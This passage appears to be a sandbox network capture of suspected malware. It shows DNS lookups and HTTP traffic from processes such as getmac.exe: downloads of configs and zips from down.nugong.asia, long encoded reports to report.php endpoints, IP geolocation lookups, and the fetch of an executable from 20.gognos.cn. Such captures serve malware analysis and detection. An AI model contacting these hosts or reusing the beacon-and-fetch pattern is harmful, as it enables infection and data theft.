X-NWS-LOG-UUID: 5664306608322357654
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:116.163.24.195:80RequestGET /cfg/pub/ps.json HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "38f11ea8d0226630fb9251be3a7b1e4b"
Content-Type: application/json
Date: Wed, 04 Oct 2023 09:25:19 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 5867845126828716719
x-cos-request-id: NjUxZDJmN2ZfZGUxNWJlMDlfNzYyYV8yNTFkZGZm
Content-Length: 14496
Accept-Ranges: bytes
X-NWS-LOG-UUID: 10896722524334358152
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GEThttp://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zipgetmac.exeRemote address:116.163.24.195:80RequestGET /pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
ResponseHTTP/1.1 200 OK
Etag: "d3ee55c63ac9cfa7fd408553f9369f5b"
Content-Type: application/zip
Date: Thu, 28 Sep 2023 19:24:41 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 11311802544265698830
x-cos-request-id: NjUxNWQyZjlfMjUxNWFlMDlfMTJmMGVfMTI0NzY3Nw==
Content-Length: 902517
Accept-Ranges: bytes
X-NWS-LOG-UUID: 2246552894700331726
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:116.163.24.195:80RequestGET /cfg/cmc/Lander.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "75280d3857e9c4a765490c9349019639"
Content-Type: text/plain
Date: Wed, 27 Sep 2023 08:25:58 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 7593444196225492913
x-cos-request-id: NjUxM2U3MTZfYWUyMzFkMDlfMTcwODBfMWI5ZmQyMQ==
Content-Length: 22928
Accept-Ranges: bytes
X-NWS-LOG-UUID: 15607132006774316370
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:116.163.24.195:80RequestGET /cfg/cmc/psexe.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "61dce90040ba158479521e19bcdc6546"
Content-Type: text/plain
Date: Wed, 04 Oct 2023 10:30:35 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 7528396351655483740
x-cos-request-id: NjUxZDNlY2JfODhhMDA4MDlfZWM5Yl8yZmI2NmZl
Content-Length: 10896
Accept-Ranges: bytes
X-NWS-LOG-UUID: 6735520674813256835
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GEThttp://mprrpt.nugong.asia/report.php?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12getmac.exeRemote address:116.163.24.195:80RequestGET /report.php?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12 HTTP/1.1
Host: mprrpt.nugong.asia
ResponseHTTP/1.1 200 OK
Date: Wed, 04 Oct 2023 10:50:34 GMT
Content-Type: application/octet-stream
Content-Type: text/html
X-Cache-Lookup: Cache Miss
Content-Length: 3
X-NWS-LOG-UUID: 3369223833385548566
Connection: keep-alive
X-Cache-Lookup: Cache Miss
-
Remote address:116.163.24.195:80RequestGET /cfg/cmc/urlmd5.json HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "a3545255258e02fabc6eef66423e1963"
Content-Type: application/json
Date: Wed, 04 Oct 2023 10:51:03 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 18144626213925968174
x-cos-request-id: NjUxZDQzOTdfYTUwMTQwYl8yZjUwXzQ4YjlkOTg=
Content-Length: 464
Accept-Ranges: bytes
X-NWS-LOG-UUID: 5886285415037095995
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:8.8.8.8:53Requestapps.game.qq.comIN AResponseapps.game.qq.comIN A101.227.134.49apps.game.qq.comIN A101.227.134.27
-
Remote address:101.227.134.49:443RequestGET /comm-htdocs/ip/get_ip.php HTTP/1.1
Accept-Encoding: gzip, deflate
Host: apps.game.qq.com
Connection: Close
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 49
Connection: close
Server: swoole-http-server
Content-Encoding: gzip
-
Remote address:8.8.8.8:53Requestocsp.digicert.cnIN AResponseocsp.digicert.cnIN CNAMEocsp.digicert.cn.w.cdngslb.comocsp.digicert.cn.w.cdngslb.comIN A47.246.48.205
-
GEThttp://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3Dgetmac.exeRemote address:47.246.48.205:80RequestGET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.digicert.cn
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Cache-Control: max-age=7200
Date: Wed, 04 Oct 2023 10:38:27 GMT
Ali-Swift-Global-Savetime: 1696415907
Via: cache2.l2de2[304,35,200-0,C], cache20.l2de2[36,0], cache5.nl2[0,0,200-0,H], cache8.nl2[1,0]
Age: 749
X-Cache: HIT TCP_MEM_HIT dirn:11:227517273
X-Swift-SaveTime: Wed, 04 Oct 2023 10:38:27 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 2ff6309c16964166562002682e
-
GEThttp://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3Dgetmac.exeRemote address:47.246.48.205:80RequestGET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.digicert.cn
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Cache-Control: max-age=7200
Date: Wed, 04 Oct 2023 10:50:40 GMT
Ali-Swift-Global-Savetime: 1696416640
Via: cache5.l2de2[4,3,200-0,M], cache14.l2de2[5,0], cache8.nl2[0,0,200-0,H], cache8.nl2[1,0]
Age: 16
X-Cache: HIT TCP_MEM_HIT dirn:6:22464691
X-Swift-SaveTime: Wed, 04 Oct 2023 10:50:40 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 2ff6309c16964166562562901e
-
Remote address:8.8.8.8:53Request49.134.227.101.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request205.48.246.47.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestsp1.baidu.comIN AResponsesp1.baidu.comIN CNAMEwww.a.shifen.comwww.a.shifen.comIN CNAMEwww.wshifen.comwww.wshifen.comIN A104.193.88.77www.wshifen.comIN A104.193.88.123
-
GEThttps://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=jsongetmac.exeRemote address:104.193.88.77:443RequestGET /8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json HTTP/1.1
Accept-Encoding: gzip
User-Agent: CHM_MSDN
Host: sp1.baidu.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Length: 354
Content-Type: application/json;charset=gbk
Date: Wed, 04 Oct 2023 10:50:58 GMT
Expires: Wed, 04 Oct 2023 10:50:58 GMT
P3p: CP=" OTI DSP COR IVA OUR IND COM "
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: Apache
Set-Cookie: BAIDUID=B3390398C56DC0BD924D34F50CA5B6C0:FG=1; expires=Thu, 03-Oct-24 10:50:58 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Set-Cookie: BAIDUID=FCABFA31CB21E04302DDF4B2CB49FE15:FG=1; expires=Thu, 03-Oct-24 10:50:58 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Tracecode: 30586970930361527306100418
Tracecode: 30586976640601061130100418
X-Powered-By: HHVM
-
GEThttps://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6eda5f540Remote address:116.163.24.195:443RequestGET /report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6 HTTP/1.1
Accept-Encoding: gzip, deflate
Host: nreprot.nugong.asia
Connection: Close
ResponseHTTP/1.1 200 OK
Date: Wed, 04 Oct 2023 10:50:59 GMT
Content-Type: text/html; charset=utf-8
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Cache-Lookup: Cache Miss
Cache-Control: private
Content-Length: 3
X-NWS-LOG-UUID: 8063151262030816650
Connection: close
X-Cache-Lookup: Cache Miss
-
Remote address:8.8.8.8:53Request77.88.193.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request226.20.18.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request226.21.18.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestocsp.trust-provider.cnIN AResponseocsp.trust-provider.cnIN CNAMEocsp.trust-provider.cn.c.vedcdnlb.comocsp.trust-provider.cn.c.vedcdnlb.comIN CNAMEbd-l7-online-tob-oversea-opt.s.vedsalb.combd-l7-online-tob-oversea-opt.s.vedsalb.comIN A117.27.246.96bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A119.36.90.164bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A36.143.236.7bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A36.248.38.100bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A111.13.153.152bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A111.48.138.18bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A111.206.23.199bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A112.50.95.96
-
GEThttp://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3Deda5f540Remote address:117.27.246.96:80RequestGET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.trust-provider.cn
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 599
Connection: keep-alive
Date: Wed, 04 Oct 2023 10:50:59 GMT
Age: 1
CF-Cache-Status: EXPIRED
CF-RAY: 80f216982cfd9836-SJC
ETag: "23d9859148cd758aa9eac8e5e5b3fa7b16968b28"
Expires: Sun, 08 Oct 2023 04:10:25 GMT
Last-Modified: Sun, 01 Oct 2023 04:10:26 GMT
WS-Cache-Status: 0
X-CCACDN-Proxy-ID: scdpinlb2
X-Frame-Options: SAMEORIGIN
X-Via: 1.1 nxian198:8 (Cdn Cache Server V2.0), 1.1 PS-JJN-01XpV172:3 (Cdn Cache Server V2.0)
X-Ws-Request-Id: 651d3c67_PS-JJN-01XpV172_34442-64456
cache-via: cache.n172-013-214.fzmp
x-request-ip: 154.61.71.13
x-tt-trace-tag: id=5
x-dsa-trace-id: 16964166594cbdc009500c9da237cb00a6df5b6771
X-Bdsa-Cache-Status: HIT
Cache-Via-Status: cache.n172-013-214.fzmp(HIT)
X-Bdsa-Cache-Tm: 1696414823-1764
Accept-Ranges: bytes
via: n172-013-214.fzmp.ToB
X-Dsa-Origin-Status: 200
server-timing: cdn-cache;desc=HIT, origin;dur=0, edge;dur=2
-
Remote address:8.8.8.8:53Request101.14.18.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request101.15.18.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request96.246.27.117.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request2.2.2.234.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request211.112.123.233.in-addr.arpaIN PTRResponse
-
GEThttp://nreprot.nugong.asia/report/report_data?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12getmac.exeRemote address:116.163.24.195:80RequestGET /report/report_data?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12 HTTP/1.1
Host: nreprot.nugong.asia
ResponseHTTP/1.1 200 OK
Date: Wed, 04 Oct 2023 10:51:08 GMT
Content-Type: text/html; charset=utf-8
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Cache-Lookup: Cache Miss
X-Cache-Lookup: Hit From Inner Cluster
Cache-Control: private
Content-Length: 3
X-NWS-LOG-UUID: 16610356150237786035
Connection: keep-alive
X-Cache-Lookup: Cache Miss
-
Remote address:116.163.24.195:80RequestGET /cfg/cmc/psexe.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "61dce90040ba158479521e19bcdc6546"
Content-Type: text/plain
Date: Wed, 04 Oct 2023 10:30:35 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 7528396351655483740
x-cos-request-id: NjUxZDNlY2JfODhhMDA4MDlfZWM5Yl8yZmI2NmZl
Content-Length: 10896
Accept-Ranges: bytes
X-NWS-LOG-UUID: 6368157307893339986
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request171.39.242.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request59.128.231.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request20.gognos.cnIN AResponse20.gognos.cnIN A222.173.195.26
-
Remote address:8.8.8.8:53Request20.gognos.cnIN AResponse20.gognos.cnIN A222.173.195.26
-
Remote address:222.173.195.26:59116RequestGET /deodej2d0.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 20.gognos.cn:59116
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Wed, 04 Oct 2023 10:51:12 GMT
Content-Type: application/octet-stream
Content-Length: 12138353
Last-Modified: Tue, 03 Oct 2023 15:56:59 GMT
Connection: keep-alive
ETag: "651c39cb-b93771"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request126.179.238.8.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request26.195.173.222.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request26.195.173.222.in-addr.arpaIN PTRResponse
-
116.163.24.195:443https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/0d78fe00f48f2148.ziptls, httpeda5f54017.1kB 486.1kB 358 356
HTTP Request
GET https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/0d78fe00f48f2148.zipHTTP Response
200 -
204.79.197.200:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=tls, http21.9kB 9.3kB 22 19
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=HTTP Response
204 -
40.1kB 1.1MB 828 827
HTTP Request
GET http://down.nugong.asia/cfg/cmc/ping.txtHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/ping.txtHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/userchange.txtHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/userpq.zipHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/blacklist.txtHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/0d78fe00f48f2148.jsonHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/pub/ms.jsonHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/pub/ps.jsonHTTP Response
200HTTP Request
GET http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zipHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/Lander.txtHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/psexe.txtHTTP Response
200HTTP Request
GET http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12HTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/urlmd5.jsonHTTP Response
200 -
1.1kB 4.4kB 14 12
HTTP Request
GET https://apps.game.qq.com/comm-htdocs/ip/get_ip.phpHTTP Response
200 -
47.246.48.205:80http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3Dhttpgetmac.exe782 B 2.2kB 7 5
HTTP Request
GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3DHTTP Response
200HTTP Request
GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3DHTTP Response
200 -
104.193.88.77:443https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=jsontls, httpgetmac.exe1.4kB 7.1kB 19 16
HTTP Request
GET https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=jsonHTTP Response
200 -
116.163.24.195:443https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6tls, httpeda5f5401.6kB 1.0kB 13 12
HTTP Request
GET https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6HTTP Response
200 -
117.27.246.96:80http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3Dhttpeda5f540525 B 1.8kB 6 4
HTTP Request
GET http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3DHTTP Response
200 -
2.1kB 12.5kB 20 19
HTTP Request
